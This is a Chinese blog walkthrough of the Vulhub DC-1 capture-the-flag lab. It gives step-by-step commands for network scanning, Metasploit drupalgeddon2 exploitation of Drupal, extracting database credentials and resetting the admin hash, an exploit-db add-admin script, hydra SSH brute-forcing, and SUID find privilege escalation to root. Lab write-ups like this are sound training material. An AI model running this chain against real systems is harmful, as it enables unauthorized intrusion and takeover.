当前位置:   article > 正文

Vulhub-DC-1靶场通关攻略_vulhub通关教程

vulhub通关教程

靶场环境配置:

修改为usb1.0     同时新建网络,把网络修改为NAT即可

首先开启靶机环境和kali黑客机器环境  通过NAT模式可以保证两者处于同一个内网环境中

切记 vmware和virtualbox的虚拟网卡可能网段不同 所以要保证kali和靶机在同一个网段 否则无法扫描到相应的靶机

1.第一步 通过kali中自带的一个工具 arp-scan进行内网存活主机探测

arp-scan -l

2.接下来可以借助nmap对目标进行扫描

其中 -sV服务指纹识别 可以探测目标系统的服务   -A 入侵式扫描   -p- 扫描全部端口

  1. nmap -sV -A -p- 192.168.109.1
  2. nmap -sV -A -p- 192.168.109.2
  3. nmap -sV -A -p- 192.168.109.139
  4. nmap -sV -A -p- 192.168.109.254

最终109.139扫描结果为开放

3.由于开放了80端口 接下来我们尝试访问一下

192.168.109.139

4.观察发现这是Drupal Site的CMS  可以借助msf对其进行框架的攻击 该cms存在漏洞

  1. msfconsole
  2. search Drupalv

5.经过尝试后发现漏洞4号是有效的

  1. use exploit/unix/webapp/drupal_drupalgeddon2
  2. show options
  3. set RHOSTS 192.168.109.139
  4. exploit

  1. shell
  2. ls
  3. cat flag1.txt

6.根据小知识

目标cms的关键目录:/var/www/sites/default/settings.php

cat /var/www/sites/default/settings.php

PS:msf该命令的输入界面不够美观 可以进行一定的美化

python -c 'import pty;pty.spawn("/bin/bash")'

7.根据已经获得的数据库的账号密码 可以直接登录mysql数据库

mysql -udbuser -pR0ck3t

  1. show databases;
  2. use drupaldb
  3. show tables;
  4. select * from users;

接下来有两种方法

方法1:通过insert语句建立一个管理员级别的用户

php scripts/password-hash.sh haha123

使用Drupal自带的密码生成工具自动生成密码

接下来可以通过修改数据库 把管理员的密码替换成我们定义的密码的Hash值 这个很容易 一个sql语句即可搞定

  1. $S$DJk2Ifvtg7DIs4CEVoQNGBN8hRL9rG2.p5JHhr40cBeeX/wLxpay
  2. UPDATE users SET pass='$S$DJk2Ifvtg7DIs4CEVoQNGBN8hRL9rG2.p5JHhr40cBeeX/wLxpay' WHERE name='admin';

接下来就可以使用账户 admin  密码 haha123登录到网站的后台了

方法2:利用漏洞建立一个用户

再打开一个ssh终端 打开msfconsole

  1. msfconsole
  2. searchsploit drupal

找到一个add admin user的漏洞

  1. exit
  2. python /usr/share/exploitdb/exploits/php/webapps/34992.py -t http://192.168.109.139 -u lyj -p lyj123

通过数据库修改完或者创建完相应的账号和密码以后 可以直接进入原来的网站登录

之后回到之前的窗口  发现flag4是一个用户

cat /etc/passwd

但是cat /etc/shadow  没有权限 没有办法进行破解

但是知道了有一个用户叫做flag4

接下来可以借助一个工具叫 hydra  可以用于猜测其账号  可以使用密码字典

密码字典位置:/usr/share/wordlists/rockyou.txt.gz

Vulhub-DC-2靶场

既然已经穷举获得了其ssh的密码 那么接下来

ssh flag4@192.168.109.139

find /root

接下来需要进行Suid提权

find / -perm -u=s -type f 2>/dev/null

接下来是find命令的提权:

  1. ls 
  2. touch haha
  3. find / -name haha -exec "/bin/sh" \;

  1. cd /root
  2. cat thefinalflag.txt



zip -r /haha.zip /var/www/*

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/笔触狂放9/article/detail/987377
推荐阅读
相关标签
  

闽ICP备14008679号